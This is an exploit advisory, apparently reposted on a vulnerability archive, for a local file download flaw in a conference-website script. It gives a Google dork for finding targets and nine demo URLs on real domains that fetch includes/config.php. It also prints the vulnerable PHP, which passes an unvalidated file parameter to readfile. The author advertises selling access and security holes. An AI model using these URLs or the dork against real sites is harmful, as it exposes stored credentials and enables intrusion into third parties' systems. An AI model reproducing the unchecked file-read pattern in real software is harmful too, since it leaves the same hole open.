Innovinc International Script Local File Download Vulnerability

2020.02.14
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

/*********************************************************************************** ** Exploit Title: Innovinc International Script Local File Download Vulnerability ** ** Exploit Author: Milad Hacking ** ** Vendor Homepage : https://innovinc.org/ ** ** Version : 1.1 ** ** Google Dork : inurl:/importantdates intext:"Innovinc International" ** ** Date: 2020-02-13 ** ** Tested on: Kali Linux / lceweasel ** *********************************************************************************** ** Demo : https://wns2020.org/download.php?file=includes/config.php https://www.ifhn-2020.org/download.php?file=includes/config.php https://www.wccrt.com/download.php?file=includes/config.php https://www.idf-2020.org/download.php?file=includes/config.php https://alzheimers-dementia.org/download.php?file=includes/config.php https://geology-earthscience.com/download.php?file=includes/config.php https://2020cce.com/download.php?file=includes/config.php https://arc-2020.org/download.php?file=includes/config.php https://icmsn2020.com/download.php?file=includes/config.php *********************************************************************************** *********************************************************************************** ** Vulnerability code : <?php $file = $_GET['file']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/pdf'); header('Content-Disposition: attachment; filename='.$_GET['newFile']); header('Content-Transfer-Encoding: binary'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; } ?> *********************************************************************************** ** Special thanks to: iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Babak Kh4t4R Mahdi CocAin - Mohammad Samiyi <3 *********************************************************************************** Sell Access And Security Holes https://fullsec.org https://telegram.me/Milad_Hacking Https://telegram.me/TheHackings http://instagram.com/Milad.Hacking milad.hacking.blackhat@Gmail.com ***********************************************************************************


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top